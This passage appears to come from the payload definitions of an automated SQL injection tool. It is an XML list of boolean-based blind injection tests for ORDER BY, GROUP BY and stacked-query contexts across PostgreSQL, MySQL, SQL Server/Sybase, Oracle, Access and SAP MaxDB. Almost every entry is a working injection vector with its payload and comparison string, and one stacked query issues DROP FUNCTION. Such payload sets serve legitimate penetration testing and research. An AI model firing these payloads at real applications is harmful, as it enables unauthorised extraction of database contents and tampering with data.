<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<!-- It exclusively works with ORDER BY -->
<test >
<title > PostgreSQL boolean-based blind - ORDER BY clause (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<!--
TODO: this would work for GROUP BY too if sqlmap did not enclose string-based [ORIGVALUE] in single quotes, but then other payloads would break.
It already works for ORDER BY because ORDER BY accepts an integer, whereas GROUP BY only accepts the format [table].[column], so [ORIGVALUE] must stay where it is.
-->
<test >
<!-- <title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause (GENERATE_SERIES - original value)</title> -->
<title > PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<!-- <clause>2,3</clause> -->
<clause > 3</clause>
<where > 1</where>
<vector > ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
<request >
<payload > ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
</request>
<response >
<comparison > ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Oracle boolean-based blind - ORDER BY, GROUP BY clause</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,IIF([INFERENCE],1,1/0)</vector>
<request >
<payload > ,IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
</request>
<response >
<comparison > ,IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
<title > Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
<request >
<payload > ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
</request>
<response >
<comparison > ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
<title > SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END)</vector>
<request >
<payload > ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)</payload>
</request>
<response >
<comparison > ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<test >
<title > SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request >
<payload > ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response >
<comparison > ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<!-- End of boolean-based blind tests - ORDER BY, GROUP BY clause -->
<!-- Boolean-based blind tests - Stacked queries -->
<test >
<title > MySQL >= 5.0 boolean-based blind - Stacked queries</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</vector>
<request >
<payload > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</payload>
<comment > #</comment>
</request>
<response >
<comparison > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > >= 5.0</dbms_version>
</details>
</test>
<test >
<title > MySQL < 5.0 boolean-based blind - Stacked queries</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</vector>
<request >
<payload > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</payload>
<comment > #</comment>
</request>
<response >
<comparison > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > < 5.0</dbms_version>
</details>
</test>
<test >
<title > PostgreSQL boolean-based blind - Stacked queries</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
<request >
<payload > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
<comment > --</comment>
</request>
<response >
<comparison > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<!-- Because of the syntax of the GENERATE_SERIES() function, the 'then' branch must evaluate to 1; do not change it -->
<test >
<title > PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>
<request >
<payload > ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1</payload>
<comment > --</comment>
</request>
<response >
<comparison > ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
<request >
<payload > ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
<comment > --</comment>
</request>
<response >
<comparison > ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</vector>
<request >
<payload > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</payload>
<comment > --</comment>
</request>
<response >
<comparison > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Oracle boolean-based blind - Stacked queries</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>
<request >
<payload > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</payload>
<comment > --</comment>
</request>
<response >
<comparison > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</comparison>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Microsoft Access boolean-based blind - Stacked queries</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;IIF([INFERENCE],1,1/0)</vector>
<request >
<payload > ;IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
<comment > %16</comment>
</request>
<response >
<comparison > ;IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
<title > SAP MaxDB boolean-based blind - Stacked queries</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
<request >
<payload > ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END</payload>
<comment > --</comment>
</request>
<response >
<comparison > ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<!-- End of boolean-based blind tests - Stacked queries -->
</root>